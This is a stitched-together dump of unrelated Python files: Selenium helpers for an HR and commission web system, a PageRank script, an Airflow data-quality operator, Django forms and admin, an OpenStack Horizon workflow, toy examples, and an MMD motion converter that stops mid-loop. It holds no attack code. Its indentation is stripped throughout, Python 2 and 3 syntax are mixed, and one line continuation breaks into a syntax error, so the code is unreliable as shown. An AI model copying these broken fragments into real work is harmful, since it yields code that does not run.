def get_link_Profit_incentive_Year(self):
"""
利润激励-年
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "利润激励-年")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Profit_incentive_Year(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 员工结算 -- 报表查询
def get_link_Employee_Commission_Report_Query(self):
"""
员工分佣报表查询
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "员工分佣报表查询")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Employee_Commission_Report_Query(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 数据中心 -- 数据汇总
def get_link_Channel_Commission(self):
"""
渠道佣金
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("数据中心", "渠道佣金")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Channel_Commission(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_easylife_Summary_commission(self):
"""
好生活结佣汇总
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("数据中心", "好生活结佣汇总")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.easylife_Summary_commission(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_easylife_Pool_funds(self):
"""
好生活资金池
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("数据中心", "好生活资金池")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.easylife_Pool_funds(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Kpi_Index_management(self):
"""
kpi指标管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("数据中心", "kpi指标管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Kpi_Index_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_easylife_kpi_check(self):
"""
好生活kpi考核
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("数据中心", "好生活kpi考核")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.easylife_kpi_check(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Rejection_pool(self):
"""
驳回统计池
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("数据中心", "驳回统计池")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Rejection_pool(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 人力中心 -- 考勤管理
def get_link_Personal_attendance_record(self):
"""
个人考勤记录
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("人力中心", "个人考勤记录")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Personal_attendance_record(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Monthly_Attendance_Statistics(self):
"""
考勤月度统计
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("人力中心", "考勤月度统计")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Monthly_Attendance_Statistics(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Attendance_management(self):
"""
考勤人员管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("人力中心", "考勤人员管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Attendance_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
|
from operator import itemgetter
import networkx as nx
import pickle
from crawl import WikiPage
def calculate_ranks():
dump_file = open('wiki_pages.bin', 'rb')
pages_dict = pickle.load(dump_file)
dump_file.close()
graph = create_graph(pages_dict)
pagerank(graph, 0.85, pages_dict)
pagerank(graph, 0.95, pages_dict)
pagerank(graph, 0.5, pages_dict)
pagerank(graph, 0.3, pages_dict)
hits(graph, pages_dict)
def create_graph(pages_dict):
graph = nx.DiGraph()
for url, page in pages_dict.iteritems():
for link in page.links:
if link in pages_dict:
graph.add_edge(url, link)
return graph
def pagerank(graph, alpha, pages_dict):
pageranks = nx.pagerank(graph, alpha=alpha)
top10_ranks = top10(pageranks, pages_dict)
print_pages_results(top10_ranks, 'PageRank results, alpha=%s' % alpha)
def hits(graph, pages_dict):
hubs, authorities = nx.hits(graph, max_iter=500, tol=0.1)
mean_hits = {}
for url, hub in hubs.iteritems():
mean_hits[url] = (hub + authorities[url]) / 2.0
top10_hubs = top10(hubs, pages_dict)
top10_authorities = top10(authorities, pages_dict)
top10_mean_hits = top10(mean_hits, pages_dict)
print_pages_results(top10_hubs, 'Hubs results')
print_pages_results(top10_authorities, 'Authorities results')
print_pages_results (top10_mean_hits, 'Mean hits results')
def top10(items_dict, pages_dict):
ranks = sorted(items_dict.iteritems(), key=itemgetter(1), reverse=True)[:10]
return [(pages_dict[url], rank) for url, rank in ranks]
def print_pages_results(pages_results, title=""):
print('\n%s:' % title)
print '--------------------------------------------------------'
for page, rank in pages_results:
print('{} < {} >'.format(page.title, rank))
print(page.url)
print('%s\n' % page.snippet)
calculate_ranks()
|
from airflow.hooks.postgres_hook import PostgresHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
from helpers import SqlDataQualityQueries
class DataQualityOperator(BaseOperator):
ui_color = "#89DA59"
@apply_defaults
def __init__(self,
tables,
redshift_conn_id = "redshift",
*args, **kwargs):
super(DataQualityOperator, self).__init__(*args, **kwargs)
self.redshift_conn_id = redshift_conn_id
self.tables = tables
def execute(self, context):
redshift_hook = PostgresHook(self.redshift_conn_id)
if redshift_hook is not None:
for tbl in self.tables:
if tbl in SqlDataQualityQueries.queries:
test_pass = False
self.log.info(f"Running quality checks for table {tbl}.")
test = SqlDataQualityQueries.queries[tbl]
query = test['test'].format(tbl)
result = redshift_hook.get_records(query)
num_records = result[0][0]
self.log.info(f"Running test: {query}")
if "expected" in test:
test_pass = num_records == test['expected']
elif "not_expected" in test:
test_pass = num_records != test['not_expected']
print(f"Result: {result}")
if test_pass:
self.log.info("==== TEST PASS ====")
else:
self.log.info("==== TEST FAIL ====")
self.log.info("")
|
from django.contrib import admin
from models import Gem, Potion, Material
class GemAdmin(admin.ModelAdmin):
list_display = ('name', 'unique', 'rank_unique')
class PotionAdmin(admin.ModelAdmin):
list_display = ('name', 'unique')
class MaterialAdmin(admin.ModelAdmin):
list_display = ('name', 'pk', 'rarity', 'unique', 'id',)
list_filter = ('rarity',)
admin.site.register(Gem, GemAdmin)
admin.site.register(Potion, PotionAdmin)
admin.site.register(Material, MaterialAdmin) |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import gettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import workflows
from openstack_dashboard import api
from openstack_dashboard.dashboards.admin.aggregates import constants
class SetAggregateInfoAction(workflows.Action):
name = forms.CharField(label=_("Name"),
max_length=255)
availability_zone = forms.CharField(label=_("Availability Zone"),
required=False,
max_length=255)
class Meta(object):
name = _("Host Aggregate Information")
help_text = _("Host aggregates divide an availability zone into "
"logical units by grouping together hosts. Create a "
"host aggregate then select the hosts contained in it.")
slug = "set_aggregate_info"
def clean(self):
cleaned_data = super().clean()
name = cleaned_data.get('name', '')
try:
aggregates = api.nova.aggregate_details_list(self.request)
except Exception:
msg = _('Unable to get host aggregate list')
exceptions.handle(self.request, msg)
raise
if aggregates is not None:
for aggregate in aggregates:
if aggregate.name.lower() == name.lower():
raise forms.ValidationError(
_('The name "%s" is already used by '
'another host aggregate.')
% name
)
return cleaned_data
class SetAggregateInfoStep(workflows.Step):
action_class = SetAggregateInfoAction
contributes = ("availability_zone",
"name")
class AddHostsToAggregateAction(workflows.MembershipAction):
def __init__(self, request, *args, **kwargs):
super().__init__(request, *args, **kwargs)
err_msg = _('Unable to get the available hosts')
default_role_field_name = self.get_default_role_field_name()
self.fields[default_role_field_name] = forms.CharField(required=False)
self.fields[default_role_field_name].initial = 'member'
field_name = self.get_member_field_name('member')
self.fields[field_name] = forms.MultipleChoiceField(required=False)
services = []
try:
services = api.nova.service_list(request, binary='nova-compute')
except Exception:
exceptions.handle(request, err_msg)
host_names = [s.host for s in services]
host_names.sort()
self.fields[field_name].choices = \
[(host_name, host_name) for host_name in host_names]
class Meta(object):
name = _("Manage Hosts within Aggregate")
slug = "add_host_to_aggregate"
class ManageAggregateHostsAction(workflows.MembershipAction):
def __init__(self, request, *args, **kwargs):
super().__init__(request, *args, **kwargs)
err_msg = _('Unable to get the available hosts')
default_role_field_name = self.get_default_role_field_name()
self.fields[default_role_field_name] = forms.CharField(required=False)
self.fields[default_role_field_name].initial = 'member'
field_name = self.get_member_field_name('member')
self.fields[field_name] = forms.MultipleChoiceField(required=False)
aggregate_id = self.initial['id']
aggregate = api.nova.aggregate_get(request, aggregate_id)
current_aggregate_hosts = aggregate.hosts
services = []
try:
services = api.nova.service_list(request, binary='nova-compute')
except Exception:
exceptions.handle(request, err_msg)
host_names = [s.host for s in services]
host_names.sort()
self.fields[field_name].choices = \
[(host_name, host_name) for host_name in host_names]
self.fields[field_name].initial = current_aggregate_hosts
class Meta(object):
name = _("Manage Hosts within Aggregate")
class AddHostsToAggregateStep(workflows.UpdateMembersStep):
action_class = AddHostsToAggregateAction
help_text = _("Add hosts to this aggregate. Hosts can be in multiple "
"aggregates.")
available_list_title = _("All available hosts")
members_list_title = _("Selected hosts")
no_available_text = _("No hosts found.")
no_members_text = _("No host selected.")
show_roles = False
contributes = ("hosts_aggregate",)
def contribute(self, data, context):
if data:
member_field_name = self.get_member_field_name('member')
context['hosts_aggregate'] = data.get(member_field_name, [])
return context
class ManageAggregateHostsStep(workflows.UpdateMembersStep):
action_class = ManageAggregateHostsAction
help_text = _("Add hosts to this aggregate or remove hosts from it. "
"Hosts can be in multiple aggregates.")
available_list_title = _("All Available Hosts")
members_list_title = _("Selected Hosts")
no_available_text = _("No Hosts found.")
no_members_text = _("No Host selected.")
show_roles = False
depends_on = ("id",)
contributes = ("hosts_aggregate",)
def contribute(self, data, context):
if data:
member_field_name = self.get_member_field_name('member')
context['hosts_aggregate'] = data.get(member_field_name, [])
return context
class CreateAggregateWorkflow(workflows.Workflow):
slug = "create_aggregate"
name = _("Create Host Aggregate")
finalize_button_name = _("Create Host Aggregate")
success_message = _('Created new host aggregate "%s".')
failure_message = _('Unable to create host aggregate "%s".')
success_url = constants.AGGREGATES_INDEX_URL
default_steps = (SetAggregateInfoStep, AddHostsToAggregateStep)
def format_status_message(self, message):
return message % self.context['name']
def handle(self, request, context):
try:
self.object = \
api.nova.aggregate_create(
request,
name=context['name'],
availability_zone=context['availability_zone'] or None)
except Exception:
exceptions.handle(request, _('Unable to create host aggregate.'))
return False
context_hosts_aggregate = context['hosts_aggregate']
for host in context_hosts_aggregate:
try:
api.nova.add_host_to_aggregate(request, self.object.id, host)
except Exception:
exceptions.handle(
request, _('Error adding Hosts to the aggregate.'))
# Host aggregate itself has been created successfully,
# so we return True here
return True
return True
class ManageAggregateHostsWorkflow(workflows.Workflow):
slug = "manage_hosts_aggregate"
name = _("Add/Remove Hosts to Aggregate")
finalize_button_name = _("Save")
success_message = _('The Aggregate was updated.')
failure_message = _('Unable to update the aggregate.')
success_url = constants.AGGREGATES_INDEX_URL
default_steps = (ManageAggregateHostsStep, )
def handle(self, request, context):
aggregate_id = context['id']
aggregate = api.nova.aggregate_get(request, aggregate_id)
current_aggregate_hosts = set(aggregate.hosts)
context_hosts_aggregate = set(context['hosts_aggregate'])
removed_hosts = current_aggregate_hosts - context_hosts_aggregate
added_hosts = context_hosts_aggregate - current_aggregate_hosts
try:
for host in removed_hosts:
api.nova.remove_host_from_aggregate(request,
aggregate_id,
host)
for host in added_hosts:
api.nova.add_host_to_aggregate(request, aggregate_id, host)
except Exception:
exceptions.handle(
request, _('Error when adding or removing hosts.'))
return False
return True
|
import os
import yaml
def readYAML(filePath):
content = None
with open(filePath, 'r') as inFile:
content = yaml.load(inFile, Loader=yaml.FullLoader)
return content
|
# -*- coding: utf-8 -*-
class Marvel_Characters():
def getCharacters(self):
return "Hulk, Thor, Ironman"
def Fliers():
return "Falcon, Wanda"
def Runners():
return "Quicksilver" |
from django import forms
from sozlukContent.models import SozlukContent
from django.contrib.auth.models import User
class WordForm(forms.ModelForm):
class Meta:
model = SozlukContent
fields = [
'orn',
'ekleyen',
'artikel',
'kategori',
'plural_wort_status',
'asw_de',
'asw_tr',
'tr',
'en',
'de',
'referans_video',
'tr_def',
'de_def',
'active',
'ekleyenId',
'abz_de',
'abz_tr',
'synm_de',
'synm_tr',
'anmerkungen_de',
'anmerkungen_tr',
'kontext_de',
'kontext_tr',
]
class LoginForm(forms.Form):
username=forms.CharField(max_length=150,label='Kullanıcı Adı')
password=forms.CharField(max_length=150,label='Parola',widget=forms.PasswordInput)
class RegisterForm(forms.ModelForm):
nameSurname=forms.CharField(max_length=150,label='Ad Soyad')
username=forms.CharField(max_length=150,label='Kullanıcı Adı')
email=forms.EmailField(max_length=150,label='Email',widget=forms.EmailInput)
password1=forms.CharField(max_length=150,label='Parola',widget=forms.PasswordInput)
password2=forms.CharField(max_length=150,label='Parola',widget=forms.PasswordInput)
class Meta:
model=User
fields=[
'username',
'password1',
'password2',
'nameSurname',
'email',
]
def clean_password2(self):
password1=self.cleaned_data.get('password1')
password2=self.cleaned_data.get('password2')
if password1 and password2 and password1 != password2:
raise forms.ValidationError("Parololar eşleşmiyor")
else:
return password2
|
x = [1, 2, 3] # Create the first list
y = [4, 5, 6] # Create the second list
t = (x, y) # Create the tuple from the lists
print(t) # Print the tuple
print(type(t)) # Display the type 'tuple'
print(t[0]) # Display the first list
print(t[0][1]) # Display the second element of the first list
a, b = t # Assign the first list to 'a' and the second list to 'b'
print(a) # Display the first list
print(b) # Display the second list
a[0] = 'sorry' # Assign 'sorry' to the first item in list 'a'
print(a) # Display the list 'a'
print(x) # Display how list 'x' has changed
c = 'Hello!', # Display how a simple comma can accidentally create a tuple
print(type(c)) # Show that 'c' is now a tuple
|
import unittest
import time
from selenium import webdriver
class MemberManageTest(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(30)
self.driver.maximize_window()
def tearDown(self):
time.sleep(10)
self.driver.quit()
def test_addMember(self):
driver = self.driver
driver.get("http://localhost/index.php?m=admin&c=public&a=login")
driver.find_element_by_name("username").send_keys("admin")
driver.find_element_by_name("userpass").send_keys("password")
driver.find_element_by_name("userverify").send_keys("1111")
driver.find_element_by_class_name("Btn").click()
driver.find_elements_by_css_selector("div.menu.fl>a")[3].click()
#driver.find_element_by_css_selector("div.side>ul:nth-child(3)>li:nth-child(3)>a").click()
driver.find_element_by_link_text("添加会员").click()
driver.switch_to.frame("mainFrame")
driver.find_element_by_name("username").send_keys("123456")
driver.find_element_by_name("mobile_phone").send_keys("13800383015")
driver.find_element_by_css_selector("[value='0']").click()
driver.find_element_by_id("birthday").send_keys("2017-11-24")
driver.find_element_by_name("email").send_keys("1452@qq.com")
driver.find_element_by_name("qq").send_keys("12456789")
driver.find_element_by_class_name("button_search").click()
|
class AdProfile:
def __init__(self, title, description):
self.title = title
self.description = description |
# -*- coding: utf-8 -*-
#
import logging
import os
import traceback
import concurrent.futures
from concurrent.futures import ThreadPoolExecutor
import numpy as np
from module.MOptions import MLegFKtoIKOptions, MOptionsDataSet
from mmd.PmxData import PmxModel # noqa
from mmd.VmdData import VmdMotion, VmdBoneFrame, VmdCameraFrame, VmdInfoIk, VmdLightFrame, VmdMorphFrame, VmdShadowFrame, VmdShowIkFrame # noqa
from mmd.VmdWriter import VmdWriter
from module.MMath import MRect, MVector3D, MVector4D, MQuaternion, MMatrix4x4 # noqa
from utils import MUtils, MServiceUtils, MBezierUtils # noqa
from utils.MLogger import MLogger # noqa
from utils.MException import SizingException, MKilledException
logger = MLogger(__name__, level=MLogger.INFO)
class ConvertLegFKtoIKService():
def __init__(self, options: MLegFKtoIKOptions):
self.options = options
def execute(self):
logging.basicConfig(level=self.options.logging_level, format="%(message)s [%(module_name)s]")
try:
service_data_txt = "足IK変換処理実行\n------------------------\nexeバージョン: {version_name}\n".format(version_name=self.options.version_name) \
service_data_txt = "{service_data_txt} VMD: {vmd}\n".format(service_data_txt=service_data_txt,
vmd=os.path.basename(self.options.motion.path)) # noqa
service_data_txt = "{service_data_txt} モデル: {model}({model_name})\n".format(service_data_txt=service_data_txt,
model=os.path.basename(self.options.motion.path), model_name=self.options.model.name) # noqa
service_data_txt = "{service_data_txt} 足首水平化: {ankle_horizonal_flg}\n".format(service_data_txt=service_data_txt,
ankle_horizonal_flg=self.options.ankle_horizonal_flg) # noqa
service_data_txt = "{service_data_txt} かかと・つま先Y=0: {ground_leg_flg}\n".format(service_data_txt=service_data_txt,
ground_leg_flg=self.options.ground_leg_flg) # noqa
service_data_txt = "{service_data_txt} 足IKブレ固定: {leg_error_tolerance}\n".format(service_data_txt=service_data_txt,
leg_error_tolerance=self.options.leg_error_tolerance) # noqa
service_data_txt = "{service_data_txt} 不要キー削除: {center_rotation}\n".format(service_data_txt=service_data_txt,
center_rotation=self.options.remove_unnecessary_flg) # noqa
logger.info(service_data_txt, decoration=MLogger.DECORATION_BOX)
# # 足首水平設定がある場合、足首水平化
# if self.options.ankle_horizonal_flg:
# self.prepare_ankle_horizonal()
# 接地設定がある場合、接地設定
if self.options.ground_leg_flg:
self.prepare_ground()
futures = []
with ThreadPoolExecutor(thread_name_prefix="leffk", max_workers=self.options.max_workers) as executor:
futures.append(executor.submit(self.convert_leg_fk2ik, "右"))
futures.append(executor.submit(self.convert_leg_fk2ik, "左"))
concurrent.futures.wait(futures, timeout=None, return_when=concurrent.futures.FIRST_EXCEPTION)
for f in futures:
if not f.result():
return False
# 最後に出力
VmdWriter(MOptionsDataSet(self.options.motion, None, self.options.model, self.options.output_path, False, False, [], None, 0, [])).write()
logger.info("出力終了: %s", os.path.basename(self.options.output_path), decoration=MLogger.DECORATION_BOX, title="成功")
return True
except MKilledException:
return False
except SizingException as se:
logger.error("足IK変換処理が処理できないデータで終了しました。\n\n%s", se.message, decoration=MLogger.DECORATION_BOX)
except Exception:
logger.critical("足IK変換処理が意図せぬエラーで終了しました。\n\n%s", traceback.format_exc(), decoration=MLogger.DECORATION_BOX)
finally:
logging.shutdown()
# 足IKの接地準備
def prepare_ground(self):
logger.info("足IK接地", decoration=MLogger.DECORATION_LINE)
motion = self.options.motion
model = self.options.model
# 足FK末端までのリンク
right_fk_links = model.create_link_2_top_one("右つま先実体", is_defined=False)
left_fk_links = model.create_link_2_top_one("左つま先実体", is_defined=False)
# グルーブに値が入ってる場合、Yはグルーブに入れる
center_x_bone_name = "センター"
if not motion.is_active_bones("センター") and motion.is_active_bones("センターMX"):
center_x_bone_name = "センターMX"
center_y_bone_name = "センター"
if motion.is_active_bones("グルーブ"):
center_y_bone_name = "グルーブ"
elif not motion.is_active_bones("センター") and motion.is_active_bones("センターMX"):
center_y_bone_name = "グルーブMY"
center_z_bone_name = "センター"
if not motion.is_active_bones("センター") and motion.is_active_bones("センターMZ"):
center_z_bone_name = "センターMZ"
# 指定範囲内の足FKキーフレを取得
fnos = motion.get_bone_fnos("左足", "左ひざ", "左足首", "右足", "右ひざ", "右足首", "下半身", center_x_bone_name, center_y_bone_name, center_z_bone_name)
# センター調整
prev_sep_fno = 0
min_ys = []
for fidx, fno in enumerate(fnos):
right_fk_3ds = MServiceUtils.calc_global_pos(model, right_fk_links, motion, fno)
right_toe_pos = right_fk_3ds["右つま先実体"]
right_sole_pos = right_fk_3ds["右足底実体"]
left_fk_3ds = MServiceUtils.calc_global_pos(model, left_fk_links, motion, fno)
left_toe_pos = left_fk_3ds["左つま先実体"]
left_sole_pos = left_fk_3ds["左足底実体"]
min_ys.append(right_sole_pos.y())
min_ys.append(left_sole_pos.y())
min_ys.append(right_toe_pos.y())
min_ys.append(left_toe_pos.y())
if fno // 500 > prev_sep_fno:
logger.count("【足IK接地準備】", fno, fnos)
prev_sep_fno = fno // 500
# 中央の値は大体接地していると見なす
median_leg_y = np.median(min_ys)
logger.debug("接地: median: %s", median_leg_y)
# # 中央上よりで調整
# median_leg_y = np.median(np.array(min_ys)[min_ys > median_leg_y])
# logger.debug("接地: median2: %s", median_leg_y)
prev_sep_fno = 0
for fidx, fno in enumerate(fnos):
# Y位置を調整する
center_y_bf = motion.calc_bf(center_y_bone_name, fno)
center_y_bf.position.setY(center_y_bf.position.y() - median_leg_y)
motion.regist_bf(center_y_bf, center_y_bone_name, fno)
if fno // 500 > prev_sep_fno:
logger.count("【足IK接地】", fno, fnos)
prev_sep_fno = fno // 500
# 足IK変換処理実行
def convert_leg_fk2ik(self, direction: str):
logger.info("足IK変換 【%s足IK】", direction, decoration=MLogger.DECORATION_LINE)
motion = self.options.motion
model = self.options.model
leg_ik_bone_name = "{0}足IK".format(direction)
toe_ik_bone_name = "{0}つま先IK".format(direction)
leg_bone_name = "{0}足".format(direction)
knee_bone_name = "{0}ひざ".format(direction)
ankle_bone_name = "{0}足首".format(direction)
# 足FK末端までのリンク
fk_links = model.create_link_2_top_one(ankle_bone_name, is_defined=False)
# 足IK末端までのリンク
ik_links = model.create_link_2_top_one(leg_ik_bone_name, is_defined=False)
# つま先IK末端までのリンク
toe_ik_links = model.create_link_2_top_one(toe_ik_bone_name, is_defined=False)
# つま先(足首の子ボーン)の名前
ankle_child_bone_name = model.bone_indexes[model.bones[toe_ik_bone_name].ik.target_index]
# つま先末端までのリンク
toe_fk_links = model.create_link_2_top_one(ankle_child_bone_name, is_defined=False)
fnos = motion.get_bone_fnos(leg_bone_name, knee_bone_name, ankle_bone_name)
# まずキー登録
prev_sep_fno = 0
fno = 0
for fno in fnos:
bf = motion.calc_bf(leg_ik_bone_name, fno)
motion.regist_bf(bf, leg_ik_bone_name, fno)
if fno // 1000 > prev_sep_fno and fnos[-1] > 0:
logger.count(f"【準備 - {leg_ik_bone_name}】", fno, fnos)
prev_sep_fno = fno // 1000
logger.info("準備完了 【%s足IK】", direction, decoration=MLogger.DECORATION_LINE)
ik_parent_name = ik_links.get(leg_ik_bone_name, offset=-1).name
# 足IKの移植
prev_sep_fno = 0
# 移植
fno = 0
for fno in fnos:
leg_fk_3ds_dic = MServiceUtils.calc_global_pos(model, fk_links, motion, fno)
_, leg_ik_matrixs = MServiceUtils.calc_global_pos(model, ik_links, motion, fno, return_matrix=True)
# 足首の角度がある状態での、つま先までのグローバル位置
leg_toe_fk_3ds_dic = MServiceUtils.calc_global_pos(model, toe_fk_links, motion, fno)
# IKの親から見た相対位置
leg_ik_parent_matrix = leg_ik_matrixs[ik_parent_name]
bf = motion.calc_bf(leg_ik_bone_name, fno)
# 足IKの位置は、足IKの親から見た足首のローカル位置(足首位置マイナス)
bf.position = leg_ik_parent_matrix.inverted() * (leg_fk_3ds_dic[ankle_bone_name] - (model.bones[ankle_bone_name].position - model.bones[ik_parent_name].position))
if bf.position.y() < 0:
bf.position.setY(0)
bf.rotation = MQuaternion()
# 一旦足IKの位置が決まった時点で登録
motion.regist_bf(bf, leg_ik_bone_name, fno)
# 足IK回転なし状態でのつま先までのグローバル位置
leg_ik_3ds_dic, leg_ik_matrisxs = MServiceUtils.calc_global_pos(model, toe_ik_links, motion, fno, return_matrix=True)
[logger.debug("f: %s, leg_ik_3ds_dic[%s]: %s", fno, k, v.to_log()) for k, v in leg_ik_3ds_dic.items()]
# つま先のローカル位置
toe_global_pos = leg_ik_3ds_dic[toe_ik_bone_name]
ankle_child_initial_local_pos = leg_ik_matrisxs[leg_ik_bone_name].inverted() * toe_global_pos
ankle_child_global_pos = leg_toe_fk_3ds_dic[ankle_child_bone_name]
ankle_child_local_pos = leg_ik_matrisxs[leg_ik_bone_name].inverted() * ankle_child_global_pos
ankle_horizonal_pos = leg_ik_matrisxs[leg_ik_bone_name].inverted() * MVector3D(ankle_child_global_pos.x(), model.bones[ankle_child_bone_name].position.y(), ankle_child_global_pos.z())
ankle_slope = abs(MVector3D.dotProduct(ankle_horizonal_pos.normalized(), ankle_child_local_pos.normalized()))
if (self.options.ankle_horizonal_flg and (ankle_slope > 0.95)) or toe_global_pos.y() < 0:
logger.debug("f: %s, %s水平 %s ankle_child_local_pos: %s, ankle_horizonal_pos: %s", fno, direction, ankle_slope, ankle_child_local_pos.to_log(), ankle_horizonal_pos.to_log())
# 大体水平の場合、地面に対して水平
ankle_child_local_pos = ankle_horizonal_pos
logger.debug("f: %s, ankle_child_initial_local_pos: %s", fno, ankle_child_initial_local_pos.to_log())
logger.debug("f: %s, ankle_child_local_pos: %s", fno, ankle_child_local_pos.to_log())
# 足IKの回転は、足首から見たつま先の方向
bf.rotation = MQuaternion.rotationTo(ankle_child_initial_local_pos, ankle_child_local_pos)
logger.debug("f: %s, ik_rotation: %s", fno, bf.rotation.toEulerAngles4MMD().to_log())
motion.regist_bf(bf, leg_ik_bone_name, fno)
if fno // 500 > prev_sep_fno and fnos[-1] > 0:
logger.count(f"【足IK変換 - {leg_ik_bone_name}】", fno, fnos)
prev_sep_fno = fno // 500
logger.info("変換完了 【%s足IK】", direction, decoration=MLogger.DECORATION_LINE)
if self.options.leg_error_tolerance > 0:
logger.info("足IKブレ固定 【%s足IK】", direction, decoration=MLogger.DECORATION_LINE)
prev_sep_fno = 0
for prev_fno, next_fno in zip(fnos[:-3], fnos[3:]):
# つま先IK末端の位置
toe_ik_3ds = MServiceUtils.calc_global_pos(model, toe_ik_links, motion, prev_fno)
prev_toe_pos = toe_ik_3ds[toe_ik_bone_name]
# 足IKの位置
sole_ik_3ds = MServiceUtils.calc_global_pos(model, ik_links, motion, prev_fno)
prev_sole_pos = sole_ik_3ds[leg_ik_bone_name]
toe_poses = []
sole_poses = []
for fno in range(prev_fno + 1, next_fno + 1):
# つま先IK末端の位置(Yはボーンの高さまで無視)
toe_ik_3ds = MServiceUtils.calc_global_pos(model, toe_ik_links, motion, fno)
toe_poses.append(np.array([toe_ik_3ds[toe_ik_bone_name].x(), max(model.bones[toe_ik_bone_name].position.y(), toe_ik_3ds[toe_ik_bone_name].y()), toe_ik_3ds[toe_ik_bone_name].z()]))
# 足IKの位置(Yはボーンの高さまで無視)
sole_ik_3ds = MServiceUtils.calc_global_pos(model, ik_links, motion, fno)
sole_poses.append(np.array([sole_ik_3ds[leg_ik_bone_name].x(), max(model.bones[leg_ik_bone_name].position.y(), sole_ik_3ds[leg_ik_bone_name].y()), sole_ik_3ds[leg_ik_bone_name].z()]))
# つま先IKの二点間距離
toe_distances = np.linalg.norm(np.array(toe_poses) - prev_toe_pos.data(), ord=2, axis=1)
# 足IKの二点間距離
sole_distances = np.linalg.norm(np.array(sole_poses) - prev_sole_pos.data(), ord=2, axis=1)
if np.max(sole_distances) <= self.options.leg_error_tolerance and prev_sole_pos.y() < 0.5 + model.bones[leg_ik_bone_name].position.y():
logger.debug("%s足固定(%s-%s): sole: %s", direction, prev_fno, next_fno, sole_distances)
# 足IKがブレの許容範囲内である場合、固定
prev_bf = motion.calc_bf(leg_ik_bone_name, prev_fno)
# 接地
prev_bf.position.setY(0)
motion.regist_bf(prev_bf, leg_ik_bone_name, prev_fno)
# つま先IKのグローバル位置を再計算
toe_ik_3ds = MServiceUtils.calc_global_pos(model, toe_ik_links, motion, prev_fno)
toe_ik_global_pos = toe_ik_3ds[toe_ik_bone_name]
for fno in range(prev_fno + 1, next_fno + 1):
bf = motion.calc_bf(leg_ik_bone_name, fno)
